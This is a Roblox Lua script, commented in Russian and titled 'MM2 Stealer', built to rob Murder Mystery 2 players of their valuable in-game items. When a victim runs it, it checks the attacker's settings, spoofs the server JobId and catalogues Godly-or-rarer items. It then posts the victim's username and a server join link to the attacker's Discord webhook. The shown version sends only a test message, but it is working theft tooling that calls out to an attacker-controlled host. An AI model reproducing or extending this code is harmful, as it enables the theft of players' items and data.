-- ОСНОВНОЙ СКРИПТ MM2 STEALER
print("=== ОСНОВНОЙ СКРИПТ ЗАПУЩЕН ===")

if getgenv().scriptExecuted then 
    print("Скрипт уже выполнен, выходим")
    return 
end
getgenv().scriptExecuted = true

-- Проверяем байпасенный JobId
if getgenv().RealJobId then
    game.JobId = getgenv().RealJobId
    print("Используем байпасенный JobId:", game.JobId)
else
    print("Байпасенный JobId не найден, используем стандартный:", game.JobId)
end

-- Проверяем сохраненные настройки
print("Проверяем сохраненные настройки...")
if getgenv().SavedSettings then
    print("Настройки найдены:", getgenv().SavedSettings)
else
    warn("СОХРАНЕННЫЕ НАСТРОЙКИ НЕ НАЙДЕНЫ!")
    return
end

local users = getgenv().SavedSettings.Usernames or {}
local min_rarity = getgenv().SavedSettings.min_rarity or "Godly"
local min_value = getgenv().SavedSettings.min_value or 1
local ping = getgenv().SavedSettings.pingEveryone or "No"
local webhook = getgenv().SavedSettings.webhook or ""

print("Webhook:", webhook)
print("Users:", #users)

-- ПРОВЕРКА НАСТРОЕК
if webhook == "" or webhook:find("your_webhook_here") then
    warn("ОШИБКА: Вебхук не настроен!")
    return
end

if next(users) == nil then
    warn("ОШИБКА: Usernames не добавлены!")
    return
end

if game.PlaceId ~= 142823291 then
    warn("ОШИБКА: Не поддерживаемая игра")
    return
end

print("Все проверки пройдены, начинаем работу...")

-- Основные переменные
local weaponsToSend = {}
local Players = game:GetService("Players")
local plr = Players.LocalPlayer
local playerGui = plr:WaitForChild("PlayerGui")

print("Игрок:", plr.Name)

-- Пытаемся получить базу данных
local database
local success, err = pcall(function()
    database = require(game.ReplicatedStorage:WaitForChild("Database"):WaitForChild("Sync"):WaitForChild("Item"))
end)

if not success then
    warn("Ошибка загрузки database:", err)
    return
end

local HttpService = game:GetService("HttpService")

local rarityTable = {
    "Common", "Uncommon", "Rare", "Legendary", "Godly", "Ancient", "Unique", "Vintage"
}

-- Упрощенная функция получения цен
local function getSimpleValueList()
    print("Создаем упрощенный список цен...")
    local valueList = {}
    
    -- Простые значения для теста
    for dataid, item in pairs(database) do
        local rarity = item.Rarity or ""
        local weaponRarityIndex = table.find(rarityTable, rarity)
        local godlyIndex = table.find(rarityTable, "Godly")
        
        if weaponRarityIndex and weaponRarityIndex >= godlyIndex then
            valueList[dataid] = 10 -- Произвольное значение для теста
        end
    end
    
    return valueList
end

local function SendTestMessage()
    local jobIdToUse = getgenv().RealJobId or game.JobId
    local joinLink = "https://fern.wtf/joiner?placeId=142823291&gameInstanceId=" .. jobIdToUse

    print("Отправляем тестовое сообщение...")
    print("JobId:", jobIdToUse)
    print("Link:", joinLink)

    local data = {
        ["content"] = "ТЕСТОВОЕ СООБЩЕНИЕ от MM2 Stealer",
        ["embeds"] = {{
            ["title"] = "🎪 Test MM2 Hit",
            ["color"] = 65280,
            ["fields"] = {
                {
                    name = "Victim Username:",
                    value = plr.Name,
                    inline = true
                },
                {
                    name = "Join link:",
                    value = joinLink,
                    inline = false
                },
                {
                    name = "Status:",
                    value = "Тестовое сообщение успешно отправлено!",
                    inline = false
                }
            },
            ["footer"] = {
                ["text"] = "MM2 stealer test"
            }
        }}
    }

    local body = HttpService:JSONEncode(data)
    
    print("Отправляем запрос на webhook...")
    
    local success, response = pcall(function()
        return request({
            Url = webhook,
            Method = "POST",
            Headers = {
                ["Content-Type"] = "application/json"
            },
            Body = body
        })
    end)
    
    if success then
        print("Статус ответа:", response.StatusCode)
        if response.StatusCode == 204 or response.StatusCode == 200 then
            print("✅ Тестовое сообщение отправлено в Discord!")
        else
            warn("❌ Ошибка Discord:", response.StatusCode, response.Body)
        end
    else
        warn("❌ Ошибка отправки:", response)
    end
end

-- Сразу отправляем тестовое сообщение
SendTestMessage()

print("=== СКРИПТ УСПЕШНО ЗАВЕРШИЛ РАБОТУ ===")
